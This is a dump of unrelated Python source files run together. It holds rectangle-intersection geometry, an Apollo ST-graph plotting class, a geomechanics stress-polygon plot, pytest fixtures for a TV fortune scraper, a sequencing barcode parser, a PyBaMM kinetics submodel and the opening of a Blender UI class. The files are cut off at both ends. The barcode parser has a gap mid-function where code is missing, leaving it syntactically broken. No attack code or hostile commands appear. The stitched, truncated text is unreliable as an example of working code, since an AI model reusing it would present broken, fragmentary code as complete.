isinstance(v, Vector): return NotImplemented return self.x*v.y - self.y*v.x class Line: # ax + by + c = 0 def __init__(self, v1, v2): self.a = v2.y - v1.y self.b = v1.x - v2.x self.c = v2.cross(v1) def __call__(self, p): return self.a * p.x + self.b * p.y + self.c def intersection(self, other): # See e.g. https://en.wikipedia.org/wiki/Line%E2%80%93line_intersection#Using_homogeneous_coordinates if not isinstance(other, Line): return NotImplemented w = self.a * other.b - self.b * other.a return Vector( (self.b * other.c - self.c * other.b)/w, (self.c * other.a - self.a*other.c)/w ) def rectangle_vertices(cx, cy, w, h, r): angle = pi*r/180 dx = w/2 dy = h/2 dxcos = dx*cos(angle) dxsin = dx*sin(angle) dycos = dy*cos(angle) dysin = dy*sin(angle) return ( Vector(cx, cy) + Vector(-dxcos - -dysin, -dxsin + -dycos), Vector(cx, cy) + Vector( dxcos - -dysin, dxsin + -dycos), Vector(cx, cy) + Vector( dxcos - dysin, dxsin + dycos), Vector(cx, cy) + Vector(-dxcos - dysin, -dxsin + dycos) ) def intersection_area(r1, r2): # r1 and r2 are in (center, width, height, rotation) representation # First convert these into a sequence of vertices rect1 = rectangle_vertices(*r1) rect2 = rectangle_vertices(*r2) # Use the vertices of the first rectangle as # starting vertices of the intersection polygon. intersection = rect1 # Loop over the edges of the second rectangle for p, q in zip(rect2, rect2[1:] + rect2[:1]): if len(intersection) <= 2: break # No intersection line = Line(p, q) # Any point p with line(p) <= 0 is on the "inside" (or on the boundary), # any point p with line(p) > 0 is on the "outside". # Loop over the edges of the intersection polygon, # and determine which part is inside and which is outside. new_intersection = [] line_values = [line(t) for t in intersection] for s, t, s_value, t_value in zip( intersection, intersection[1:] + intersection[:1], line_values, line_values[1:] + line_values[:1]): if s_value <= 0: new_intersection.append(s) if s_value * t_value < 0: # Points are on opposite sides. # Add the intersection of the lines to new_intersection. intersection_point = line.intersection(Line(s, t)) new_intersection.append(intersection_point) intersection = new_intersection # Calculate area if len(intersection) <= 2: return 0 return 0.5 * sum(p.x*q.y - p.y*q.x for p, q in zip(intersection, intersection[1:] + intersection[:1]))modules/tools/mapshow/libs/subplot_st_main.py #!/usr/bin/env python3 ############################################################################### # Copyright 2017 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### class StMainSubplot: def __init__(self, ax, st_name): self.st_curve_line, = ax.plot([0], [0], "k.", lw=3, alpha=0.5) self.kernel_cruise_line, = ax.plot([0], [0], "g.", lw=3, alpha=0.5) self.kernel_follow_line, = ax.plot([0], [0], "y.", lw=3, alpha=0.5) self.obstacle_boundary_lines = [] self.obstacle_annotations = [] self.obstacle_boundary_size = 10 for i in range(self.obstacle_boundary_size): self.obstacle_boundary_lines.append( ax.plot([0], [0], "r-", lw=1, alpha=1)[0]) self.obstacle_annotations.append(ax.text(0, 0, "")) # self.st_name = planning_config_pb2.TaskType.Name( # planning_config_pb2.QP_SPLINE_ST_SPEED_OPTIMIZER) self.st_name = st_name ax.set_xlim(-3, 9) ax.set_ylim(-10, 220) ax.set_xlabel("t (second)") ax.set_ylabel("s (m)") ax.set_title(st_name) self.set_visible(False) def set_visible(self, visible): self.st_curve_line.set_visible(visible) self.kernel_cruise_line.set_visible(visible) self.kernel_follow_line.set_visible(visible) for line in self.obstacle_boundary_lines: line.set_visible(visible) for text in self.obstacle_annotations: text.set_visible(visible) def show(self, planning): self.set_visible(False) planning.st_data_lock.acquire() if self.st_name not in planning.st_data_boundary_s: planning.st_data_lock.release() return obstacles_boundary_s = planning.st_data_boundary_s[self.st_name] obstacles_boundary_t = planning.st_data_boundary_t[self.st_name] obstacles_type = planning.st_data_boundary_type[self.st_name] cnt = 1 for boundary_name in obstacles_boundary_s.keys(): if cnt >= self.obstacle_boundary_size: print("WARNING: number of path lines is more than " \ + self.obstacle_boundary_size) continue boundary = self.obstacle_boundary_lines[cnt] boundary.set_visible(True) boundary.set_xdata(obstacles_boundary_t[boundary_name]) boundary.set_ydata(obstacles_boundary_s[boundary_name]) center_t = 0 center_s = 0 for i in range(len(obstacles_boundary_t[boundary_name]) - 1): center_s += obstacles_boundary_s[boundary_name][i] center_t += obstacles_boundary_t[boundary_name][i] center_s /= float(len(obstacles_boundary_s[boundary_name]) - 1) center_t /= float(len(obstacles_boundary_t[boundary_name]) - 1) annotation = self.obstacle_annotations[cnt] annotation.set_visible(True) annotation.set_text(boundary_name + "_" + obstacles_type[boundary_name] .replace("ST_BOUNDARY_TYPE_", "")) annotation.set_x(center_t) annotation.set_y(center_s) cnt += 1 self.st_curve_line.set_visible(True) self.st_curve_line.set_xdata(planning.st_curve_t[self.st_name]) self.st_curve_line.set_ydata(planning.st_curve_s[self.st_name]) self.st_curve_line.set_label(self.st_name[0:5]) self.kernel_cruise_line.set_visible(True) self.kernel_cruise_line.set_xdata( planning.kernel_cruise_t[self.st_name]) self.kernel_cruise_line.set_ydata( planning.kernel_cruise_s[self.st_name]) self.kernel_follow_line.set_visible(True) self.kernel_follow_line.set_xdata( planning.kernel_follow_t[self.st_name]) self.kernel_follow_line.set_ydata( planning.kernel_follow_s[self.st_name]) planning.st_data_lock.release() def zobackogram(Sv, Pp, mu): import numpy as np import matplotlib.pyplot as plt # ratio of S1-Pp to S3-Pp ratio = (np.sqrt((mu**2) + 1) + mu)**2 # lower limit of Shmin, from Sv Sh = ((Sv - Pp) / ratio) + Pp # upper limit of SHmax, from Sv and Pp SH = (ratio * (Sv - Pp)) + Pp # axes of plot Sv_x = np.arange(0, (SH + 10000), 10) Sv_y = Sv_x plt.figure(figsize=(10,10)) # plot Sv line and Sv data p1 = plt.plot(Sv_x, Sv_y, color='green') p2 = plt.plot(Sv, Sv, 'o', color='black') # for Normal Faulting (NF) regime nf_x = np.array([Sh, Sh, Sv, Sh]) nf_y = np.array([Sh, Sv, Sv, Sh]) nf = plt.plot(nf_x, nf_y, color='blue') # for Strike Slip (SS) regime ss_x = np.array([Sh, Sv, Sv, Sh]) ss_y = np.array([Sv, Sv, SH, Sv]) ss = plt.plot(ss_x, ss_y, color='red') # for Reverse Faulting (RF) regime rf_x = np.array([Sv, Sv, SH, Sv]) rf_y = np.array([Sv, SH, SH, Sv]) rf = plt.plot(rf_x, rf_y, color='black') plt.legend((p1[0], p2[0], nf[0], ss[0], rf[0]), ['Sv line', 'Sv data', 'Normal Faulting (NF) Polygon', 'Strike Slip (SS) Polygon', 'Reverse Faulting (RF) Polygon']) plt.title('Stress Polygons (Zoback-o-gram)') plt.xlabel('Shmin (psi)'); plt.ylabel('SHmax (psi)') plt.xlim(xmin=0); plt.ylim(ymin=0) plt.gca().set_aspect('equal') return(p1, p2, nf, ss, rf) import os import datetime import pytest from bs4 import BeautifulSoup from myfortune import AppConfig from myfortune import FujiTvScraper from myfortune import Mailer from myfortune import NipponTvScraper from myfortune import Scraper from myfortune import TbsScraper from myfortune import TvAsahiScraper def test_file(filename): path = os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', ) with open(os.path.join(path, filename), 'r') as f: return f.read() @pytest.fixture(scope='module') def fake_datetime(): return datetime.datetime(2020, 7, 17, 0, 0, 0) @pytest.fixture(scope='module') def fuji_tv_data(): return test_file('fuji_tv.html').encode('utf-8') @pytest.fixture(scope='module') def nippon_tv_data(): return test_file('nippon_tv.html').encode('utf-8') @pytest.fixture(scope='module') def tbs_data(): return test_file('tbs.html').encode('utf-8') @pytest.fixture(scope='module') def tv_asahi_data(): return test_file('tv_asahi.html').encode('utf-8') @pytest.fixture(scope='module') def dummy_cache(): return os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', 'dummy_cache.pickle' ) @pytest.fixture(scope='module') def dummy_config(): return os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', 'myfortune.json' ) @pytest.fixture def scraper(): return Scraper() @pytest.fixture def fuji_tv_scraper(fuji_tv_data): scraper = FujiTvScraper() scraper._soup = BeautifulSoup(fuji_tv_data, 'html.parser') return scraper @pytest.fixture def nippon_tv_scraper(nippon_tv_data): scraper = NipponTvScraper() scraper._soup = BeautifulSoup(nippon_tv_data, 'html.parser') return scraper @pytest.fixture def tbs_scraper(tbs_data): scraper = TbsScraper() scraper._soup = BeautifulSoup(tbs_data, 'html.parser') return scraper @pytest.fixture def tv_asahi_scraper(tv_asahi_data): scraper = TvAsahiScraper() scraper._soup = BeautifulSoup(tv_asahi_data, 'html.parser') return scraper @pytest.fixture def app_config(): return AppConfig() @pytest.fixture def mailer(): smtp_config = { 'username': 'bar@localhost', 'password': 'password', 'encryption': 'SSL', 'smtp_address': 'localhost', 'port': 1025 } return Mailer(smtp_config) Parallel-Seq/parse_barcode.py1-10 import sys import re import os import datetime import pickle import gzip import numpy as np import pandas as pd from multiprocessing import Process, Manager from generate_bc_dicts import free_divergence,write_pkl def get_min_edit_dists(bc,edit_dict,max_d=3): """Returns a list of nearest edit dist seqs Input 8nt barcode, edit_dist_dictionary Output , """ bc_matches = edit_dict[0][bc] edit_dist = 0 if (len(bc_matches)==0) and (max_d>=1): edit_dist+=1 bc_matches = edit_dict[1][bc] if (len(bc_matches)==0) and (max_d>=2): edit_dist+=1 bc_matches = edit_dict[2][bc] if (len(bc_matches)==0) and (max_d>=3): edit_dist+=1 bc_matches = edit_dict[3][bc] return bc_matches,edit_dist def split_fq(output_dir, prefix, nthreads): fastq1=output_dir+'/trimmed/'+prefix+'_R1.fq.gz' fastq2=output_dir+'/trimmed/'+prefix+'_R2.fq.gz' fq1 = gzip.open(fastq1,'rb') fq2 = gzip.open(fastq2,'rb') fq1_chunks = {} fq2_chunks = {} for i in range(nthreads): fq1_chunks[i] = open(output_dir + '/trimmed/'+prefix+'_R1.chunk%d.fastq' %(i+1),'w') fq2_chunks[i] = open(output_dir + '/trimmed/'+prefix+'_R2.chunk%d.fastq' %(i+1),'w') # Get the total number of aligned reads: with open(output_dir +'/trimmed/'+prefix+'.log') as f: log=f.read() try: num_reads = re.search("Pairs written.*\s+([\d,]+)\s[(].*\n", log).group(1) except: sys.exit("Invalid trim log file!") num_reads = int(num_reads.replace(',','')) # Number of reads per file. Round up to ensure we don't write (nthreads +1) files. reads_per_chunk = int(np.ceil(num_reads/nthreads)) c = 0 while True: seqname1 = fq1.readline().decode("utf-8") if not seqname1: break seq1 = fq1.readline().decode("utf-8") strand1 = fq1.readline().decode("utf-8") qual1 = fq1.readline().decode("utf-8") seqname2 = fq2.readline().decode("utf-8") seq2 = fq2.readline().decode("utf-8") strand2 = fq2.readline().decode("utf-8") qual2 = fq2.readline().decode("utf-8") chunk = int(np.floor(c/reads_per_chunk)) fq1_chunks[chunk].write(seqname1+seq1+strand1+qual1) fq2_chunks[chunk].write(seqname2+seq2+strand2+qual2) c+=1 for i in range(nthreads): fq1_chunks[i].close() fq2_chunks[i].close() fq1.close() fq2.close() def join_fq(output_dir, prefix, nthreads): files1 = [output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R1.chunk%d.fastq' %i for i in range(1,nthreads+1)] files2 = [output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R2.chunk%d.fastq' %i for i in range(1,nthreads+1)] fout1=open(output_dir + '/parse_bc/'+prefix+ '_tag_barcode_R1.fastq', "w") fout2=open(output_dir + '/parse_bc/'+prefix+ '_tag_barcode_R2.fastq', "w") for f in files1: fin=open(f) fout1.write(fin.read()) fin.close() fout1.close() for f in files2: fin=open(f) fout2.write(fin.read()) fin.close() fout2.close() def preprocess_fastq_chunk(output_dir, prefix, bcset, bc4, counts, config, return_dict, chunk=None): """ get barcode """ parse_bc_dir=output_dir+'/parse_bc' if chunk is None: #not used fastq1=output_dir+'/trimmed/'+prefix+'_R1.fq.gz' fastq2=output_dir+'/trimmed/'+prefix+'_R2.fq.gz' fastq1_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R1.fastq' fastq2_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R2.fastq' else: fastq1=output_dir+'/trimmed/'+prefix+'_R1.chunk%d.fastq'%chunk fastq2=output_dir+'/trimmed/'+prefix+'_R2.chunk%d.fastq'%chunk fastq1_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R1.chunk%d.fastq'%chunk fastq2_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R2.chunk%d.fastq'%chunk umi_bc_len = config.umi_bc_len umi_bc_starts = config.umi_bc_starts tag_seq=config.tag_seq tag_start=config.tag_start tag_length=config.tag_length method=config.method bc_edit_dist=config.bc_edit_dist tag_edit_dist=config.tag_edit_dist bc_edit_dist1 = int(bc_edit_dist[0]) bc_edit_dist2 = int(bc_edit_dist[1]) bc_edit_dist3 = int(bc_edit_dist[2]) tag_edit_dist_atac = int(tag_edit_dist[0]) tag_edit_dist_rna = int(tag_edit_dist[1]) def check_pkl(barcode_n): if not os.path.exists(bcset+'/barcode%s.txt'%barcode_n): sys.exit('Error: No barcode%s.txt'%barcode_n) elif not os.path.exists(bcset+'/bc_dict_%s_%s.pkl'%(barcode_n,method)): write_pkl(method,bcset) check_pkl('1') check_pkl('2') check_pkl('3') with open(bcset+'/bc_dict_1_%s.pkl'%method, 'rb') as f: edit_dict_v1 = pickle.load(f) with open(bcset+'/bc_dict_2_%s.pkl'%method, 'rb') as f: edit_dict_v2 = pickle.load(f) with open(bcset+'/bc_dict_3_%s.pkl'%method, 'rb') as f: edit_dict_v3 = pickle.load(f) parse_bc_dir=output_dir+'/parse_bc' if not os.path.exists(parse_bc_dir): os.makedirs(parse_bc_dir) # Read in barcode sequences bc1 = pd.read_csv(bcset+'/barcode1.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc2 = pd.read_csv(bcset+'/barcode2.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc3 = pd.read_csv(bcset+'/barcode3.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc1_edit_dict = edit_dict_v1 bc2_edit_dict = edit_dict_v2 bc3_edit_dict = edit_dict_v3 def correct_barcodes(bc1,bc2,bc3, counts, bc1_dict=bc1_edit_dict,bc2_dict=bc2_edit_dict,bc3_dict=bc3_edit_dict): bc1_matches,edit_dist1 = get_min_edit_dists(bc1,bc1_dict,max_d=bc_edit_dist1) bc2_matches,edit_dist2 = get_min_edit_dists(bc2,bc2_dict,max_d=bc_edit_dist2) bc3_matches,edit_dist3 = get_min_edit_dists(bc3,bc3_dict,max_d=bc_edit_dist3) if 0==edit_dist1==edit_dist2==edit_dist3: bc1_m=bc1_matches[0] bc2_m=bc2_matches[0] bc3_m=bc3_matches[0] return 'perfect',bc1_m,bc2_m,bc3_m else: matches = 0 for bc1_m in bc1_matches: for bc2_m in bc2_matches: for bc3_m in bc3_matches: try: cur_counts = counts[(bc1_m,bc2_m,bc3_m)] except: cur_counts = 0 if cur_counts>0: bc1_fixed = bc1_m bc2_fixed = bc2_m bc3_fixed = bc3_m matches += 1 #print('Fixed:',matches,\ # 'Nearest_bcs',(len(bc1_matches),len(bc2_matches),len(bc3_matches)),\ # 'Edit_dist',(edit_dist1,edit_dist2,edit_dist3)) if matches==1: return 'correct',bc1_fixed,bc2_fixed,bc3_fixed elif matches>1: return 'multi_match','','','' else: return 'no_match','','','' def check_atac_rna(tag_readcut): distance = free_divergence(tag_seq, tag_readcut) if distance <= tag_edit_dist_atac: return 'A' # atac reads elif distance >= tag_edit_dist_rna: return 'R' # rna read else: return 'W' # waste fastq_reads = 0 fastq_valid_barcode_reads = 0 bc1_Q30_sum = 0 bc2_Q30_sum = 0 bc3_Q30_sum = 0 umi_Q30_sum = 0 R1_cDNA_Q30_sum = 0 R2_cDNA_Q30_sum = 0 perfect_bc_n = 0 correct_bc_n = 0 multimatch_bc_n = 0 nomatch_bc_n = 0 atac_reads = 0 rna_reads = 0 waste_reads = 0 with open(fastq1,'r') as f1, open(fastq2,'r') as f2, \ open(fastq1_out,'w') as fout1,\ open(fastq2_out,'w') as fout2: while True: header2 = f2.readline() #bc4 = header.strip().split(':')[-1] if len(header2)==0: break seq2 = f2.readline() bc1 = seq2[umi_bc_starts[1]:umi_bc_starts[1]+umi_bc_len[1]] bc2 = seq2[umi_bc_starts[2]:umi_bc_starts[2]+umi_bc_len[2]] bc3 = seq2[umi_bc_starts[3]:umi_bc_starts[3]+umi_bc_len[3]] umi = seq2[umi_bc_starts[0]:umi_bc_starts[0]+umi_bc_len[0]] strand2 = f2.readline() qual2 = f2.readline() map_tag, bc1,bc2,bc3 = correct_barcodes(bc1,bc2,bc3, counts) if map_tag=='perfect': perfect_bc_n+=1 elif map_tag=='correct': correct_bc_n+=1 elif map_tag=='multi_match': multimatch_bc_n+=1 elif map_tag=='no_match': nomatch_bc_n+=1 cellbc_umi = bc1 + bc2 + bc3 +':' + umi header1 = f1.readline() seq1 = f1.readline() strand1 = f1.readline() qual1 = f1.readline() if len(cellbc_umi)==sum(umi_bc_len)+1: tag_readcut = seq2[tag_start:(tag_start+tag_length)] tag = check_atac_rna(tag_readcut) header1 = '@' + tag + '_' + bc4 + cellbc_umi + ':'+header1[1:].split()[0] +'\n' header2 = '@' + tag + '_' + bc4 + cellbc_umi + ':'+header2[1:].split()[0] +'\n' fout1.write(header1) fout1.write(seq1) fout1.write(strand1) fout1.write(qual1) fout2.write(header2) fastq_valid_barcode_reads += 1 if tag=='A': atac_reads += 1 fout2.write(seq2[(tag_start+tag_length):]) fout2.write(strand2) fout2.write(qual2[(tag_start+tag_length):]) elif tag=='R': rna_reads += 1 fout2.write(seq2[tag_start:]) fout2.write(strand2) fout2.write(qual2[tag_start:]) elif tag=='W': waste_reads +=1 fout2.write(seq2[(tag_start+tag_length):]) fout2.write(strand2) fout2.write(qual2[(tag_start+tag_length):]) fastq_reads += 1 # bc1 refers to the first barcode seen in the sequencing read, but is actually # bc3 in terms of rounds bc1_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[1]:umi_bc_starts[1]+umi_bc_len[1]]]) bc2_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[2]:umi_bc_starts[2]+umi_bc_len[2]]]) bc3_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[3]:umi_bc_starts[3]+umi_bc_len[3]]]) umi_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[0]:umi_bc_starts[0]+umi_bc_len[0]]]) # Make sure R2 length > (bc_starts[3]+umi_bc_len[3]) R2_cDNA_Q30_sum += np.mean([ord(c)>62 for c in qual2[umi_bc_starts[3]+umi_bc_len[3]:-1]]) R1_cDNA_Q30_sum += np.mean([ord(c)>62 for c in qual1[:-1]]) return_dict[chunk]=np.array([fastq_reads, fastq_valid_barcode_reads, bc1_Q30_sum, bc2_Q30_sum, bc3_Q30_sum, umi_Q30_sum, R1_cDNA_Q30_sum, R2_cDNA_Q30_sum, perfect_bc_n, correct_bc_n, multimatch_bc_n, nomatch_bc_n, atac_reads, rna_reads,waste_reads]) def preprocess_fastq(output_dir, prefix, bcset, bc4, config, nthreads): parse_bc_dir=output_dir+'/parse_bc' umi_bc_len = config.umi_bc_len umi_bc_starts = config.umi_bc_starts nthreads = int(nthreads) # Read in barcode sequences bc1 = pd.read_csv(bcset+'/barcode1.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc2 = pd.read_csv(bcset+'/barcode2.txt',names=['barcode'],index_col=0, sep='\t').barcode.values bc3 = pd.read_csv(bcset+'/barcode3.txt',names=['barcode'],index_col=0, sep='\t').barcode.values def get_perfect_bc_counts(fastq2, n_reads=1000000): #randomly choose n_reads lines=0 f=gzip.open(fastq2,'rb') for line in f: lines+=1 total_reads = lines/4 n_bin = round(int(total_reads)/n_reads-0.5) quality_scores = [] seqs = [] n = 0 with gzip.open(fastq2,'rb') as f: while n=', config.tag_edit_dist[1]) split_fq(output_dir, prefix, nthreads) manager = Manager() return_dict = manager.dict() Pros = [] for i in range(1,nthreads+1): print('Starting thread %d' %i) p = Process(target=preprocess_fastq_chunk, args=(output_dir, prefix, bcset, bc4, counts, config, return_dict, i)) Pros.append(p) p.start() for t in Pros: t.join() join_fq(output_dir, prefix, nthreads) stats_array=np.zeros(15) for i in range(1,nthreads+1): stats_array+=return_dict[i] #print(stats_array) [fastq_reads, fastq_valid_barcode_reads, bc1_Q30_sum, bc2_Q30_sum, bc3_Q30_sum, umi_Q30_sum, R1_cDNA_Q30_sum, R2_cDNA_Q30_sum, perfect_bc_n, correct_bc_n, multimatch_bc_n, nomatch_bc_n, atac_reads, rna_reads, waste_reads]=list(stats_array) with open(parse_bc_dir +'/'+prefix+ '_sequencing_stats.txt', 'w') as f: f.write('umi_Q30\t%0.4f\n' %(umi_Q30_sum/fastq_reads)) f.write('bc1_Q30\t%0.4f\n' %(bc1_Q30_sum/fastq_reads)) f.write('bc2_Q30\t%0.4f\n' %(bc2_Q30_sum/fastq_reads)) f.write('bc3_Q30\t%0.4f\n' %(bc3_Q30_sum/fastq_reads)) f.write('R2_tag+cDNA_Q30\t%0.4f\n' %(R2_cDNA_Q30_sum/fastq_reads)) f.write('R1_cDNA_Q30\t%0.4f\n' %(R1_cDNA_Q30_sum/fastq_reads)) with open(parse_bc_dir +'/'+prefix+ '_pipeline_stats.txt', 'w') as f: f.write('fastq_reads\t%d\n' %fastq_reads) f.write('fastq_valid_barcode_reads\t%d\n' %fastq_valid_barcode_reads) f.write('--ATAC_valid_barcode_reads\t%d\n' %atac_reads) f.write('--RNA_valid_barcode_reads\t%d\n' %rna_reads) f.write('--Undetermined_valid_barcode_reads\t%d\n' %waste_reads) f.write('fastq_valid_rate\t%0.4f\n' %(fastq_valid_barcode_reads*1.0/fastq_reads)) f.write('--ATAC_valid\t%0.4f\n' %(atac_reads*1.0/fastq_reads)) f.write('--RNA_valid\t%0.4f\n' %(rna_reads*1.0/fastq_reads)) f.write('--Undetermined_valid\t%0.4f\n' %(waste_reads*1.0/fastq_reads)) f.write('--perfect_match\t%0.4f\n' %(perfect_bc_n*1.0/fastq_reads)) f.write('--correct_match\t%0.4f\n' %(correct_bc_n*1.0/fastq_reads)) f.write('multi_match\t%0.4f\n' %(multimatch_bc_n*1.0/fastq_reads)) f.write('no_match\t%0.4f\n' %(nomatch_bc_n*1.0/fastq_reads)) f.write('total_barcode_num\t%d\n' %len(counts.keys())) f.write('perfect_barcodes_all\t%0.4f\n'%perfect_rate[0]) f.write('perfect_barcode1\t%0.4f\n'%perfect_rate[1]) f.write('perfect_barcode2\t%0.4f\n'%perfect_rate[2]) f.write('perfect_barcode3\t%0.4f\n'%perfect_rate[3]) for i in range(1,int(nthreads)+1): os.remove(output_dir +'/trimmed/'+prefix+ '_R1.chunk%d.fastq' %i) os.remove(output_dir +'/trimmed/'+prefix+ '_R2.chunk%d.fastq' %i) os.remove(output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R1.chunk%d.fastq' %i) os.remove(output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R2.chunk%d.fastq' %i) if __name__=='__main__': import sys import importlib output_dir='/Share2/home/zhangqf5/yanqiu/scAR/output/test_set3' #prefix='test' prefix='W56' bcset='Data/barcodes/bcset1_all' bc4='testxxx.' config_file='config_10nt' nthreads=10 config = importlib.import_module(config_file) preprocess_fastq(output_dir, prefix, bcset, bc4, config, nthreads) #join_fq(output_dir, prefix, nthreads) pycharts2/__init__.py0 # from __future__ import absolute_import from ._Chart import Chart ex004.py0 algo: str = input('Digite algo:') print('O tipo de primitivo da variável é ', type(algo)) print('É um número? ', algo.isnumeric()) print('É alfabético?', algo.isalpha()) print('É decimal?', algo.isdecimal()) print('Esta em minusculas?',algo.islower()) # # Leading-order diffusion limited kinetics # from .base_diffusion_limited import BaseModel class LeadingOrderDiffusionLimited(BaseModel): """ Leading-order submodel for diffusion-limited kinetics Parameters ---------- param : model parameters domain : str The domain to implement the model, either: 'Negative' or 'Positive'. **Extends:** :class:`pybamm.interface.diffusion_limited.BaseModel` """ def __init__(self, param, domain): super().__init__(param, domain) def _get_diffusion_limited_current_density(self, variables): if self.domain == "Negative": j_p = variables[ "X-averaged positive electrode" + self.reaction_name + " interfacial current density" ] j = -self.param.l_p * j_p / self.param.l_n return j def _get_j_diffusion_limited_first_order(self, variables): """ First-order correction to the interfacial current density due to diffusion-limited effects. For a general model the correction term is zero, since the reaction is not diffusion-limited """ j_leading_order = variables[ "Leading-order x-averaged " + self.domain.lower() + " electrode" + self.reaction_name + " interfacial current density" ] param = self.param if self.domain == "Negative": N_ox_s_p = variables["Oxygen flux"].orphans[1] N_ox_neg_sep_interface = N_ox_s_p[0] j = -N_ox_neg_sep_interface / param.C_e / param.s_ox_Ox / param.l_n return (j - j_leading_order) / param.C_e ''' Copyright (C) 2021 CG Cookie http://cgcookie.com Created by , This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ''' import os import re import sys import math import time import random import traceback import contextlib from math import floor, ceil from inspect import signature from itertools import dropwhile import bpy import bgl import blf import gpu from gpu.types import GPUOffScreen from gpu_extras.presets import draw_texture_2d from mathutils import Vector, Matrix from .ui_linefitter import LineFitter from .ui_core import UI_Element, UI_Element_PreventMultiCalls, DEBUG_COLOR_CLEAN from .blender import tag_redraw_all from .ui_styling import UI_Styling, ui_defaultstylings from .ui_utilities import helper_wraptext, convert_token_to_cursor from .drawing import ScissorStack, FrameBuffer from .fsm import FSM from .useractions import ActionHandler from .boundvar import BoundVar from .debug import debugger, dprint, tprint from .decorators import debug_test_call, blender_version_wrapper, add_cache from .fontmanager import FontManager from .globals import Globals from .hasher import Hasher from .maths import Vec2D, Color, mid, Box2D, Size1D, Size2D, Point2D, RelPoint2D, Index2D, clamp, NumberUnit from .profiler import profiler, time_it from .shaders import Shader from .utils import iter_head from ..ext import png from ..ext.apng import APNG class UI_Document: default_keymap = { 'commit': {'RET',}, 'cancel': {'ESC',}, 'keypress': {c for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'} | {'NUMPAD_%d'%i for i in range(10)} | {'NUMPAD_PERIOD','NUMPAD_MINUS','NUMPAD_PLUS','NUMPAD_SLASH','NUMPAD_ASTERIX'} | {'ZERO', 'ONE', 'TWO', 'THREE', 'FOUR', 'FIVE', 'SIX', 'SEVEN', 'EIGHT', 'NINE'} | {'PERIOD', 'MINUS', 'SPACE', 'SEMI_COLON', 'COMMA', 'QUOTE', 'ACCENT_GRAVE', 'PLUS', 'SLASH', 'BACK_SLASH', 'EQUAL', 'LEFT_BRACKET', 'RIGHT_BRACKET'}, 'scroll top': {'HOME'}, 'scroll bottom': {'END'}, 'scroll up': {'WHEELUPMOUSE', 'PAGE_UP', 'UP_ARROW', }, 'scroll down': {'WHEELDOWNMOUSE', 'PAGE_DOWN', 'DOWN_ARROW', }, 'scroll': {'TRACKPADPAN'}, } doubleclick_time = bpy.context.preferences.inputs.mouse_double_click_time / 1000 # 0.25 wheel_scroll_lines = 3 # bpy.context.preferences.inputs.wheel_scroll_lines, see https://developer.blender.org/rBbec583951d736776d2096368ef8d2b764287ac11 allow_disabled_to_blur = False show_tooltips = True tooltip_delay = 0.50 max_click_dist = 10 # allows mouse to travel off element and still register a click event allow_click_time = 0.50 # allows for very fast clicking. ignore max_click_dist if time(mouseup-mousedown) is at most allow_click_time def __init__(self): self._context = None self._area = None self._exception_callbacks = [] self._ui_scale = Globals.drawing.get_dpi_mult() self._draw_count = 0 self._draw_time = 0 self._draw_fps = 0 def add_exception_callback(self, fn): self._exception_callbacks += [fn] def _callback_exception_callbacks(self, e): for fn in self._exception_callbacks: try: fn(e) except Exception as e2: print(f'UI_Document: Caught exception while calling back exception callbacks: {fn.__name__}') print(f' original: {e}') print(f' additional: {e2}') debugger.print_exception() # @profiler.function def init(self, context, **kwargs): self._callbacks = { 'preclean': set(), 'postclean': set(), 'postflow': set(), 'postflow once': set(), } self.defer_cleaning = False self._context = context self._area = context.area self.actions = ActionHandler(bpy.context, UI_Document.default_keymap) self._body = UI_Element(tagName='body', document=self) # root level element self._tooltip = UI_Element(tagName='dialog', classes='tooltip', can_hover=False, parent=self._body) self._tooltip.is_visible = False self._tooltip_message = None self._tooltip_wait = None self._tooltip_mouse = None self._reposition_tooltip_before_draw = False self.fsm = FSM(self, start='main') self.ignore_hover_change = False self._sticky_dist = 20 self._sticky_element = None # allows the mouse to drift a few pixels off before handling mouseleave self._under_mouse = None self._under_mousedown = None self._under_down = None self._focus = None self._focus_full = False self._last_mx = -1 self._last_my = -1 self._last_mouse = None self._last_under_mouse = None self._last_under_click = None self._last_click_time = 0 self._last_sz = None self._last_w = -1 self._last_h = -1 def update_callbacks(self, ui_element, force_remove=False): for cb,fn in [('preclean', ui_element.preclean), ('postclean', ui_element.postclean), ('postflow', ui_element.postflow)]: if force_remove or not fn: self._callbacks[cb].discard(ui_element) else: self._callbacks[cb].add(ui_element) @property def body(self): return self._body @property def activeElement(self): return self._focus def center_on_mouse(self, element): # centers element under mouse, must be done between first and second layout calls if element is None: return def center(): element._relative_pos = None mx,my = self.actions.mouse # w,h = element.width_pixels,element.height_pixels w,h = element.width_pixels,element._dynamic_full_size.height l = mx-w/2 t = -self._body.height_pixels + my + h/2 element.reposition(left=l, top=t) self._callbacks['postflow once'].add(center) def _reposition_tooltip(self, force=False): if 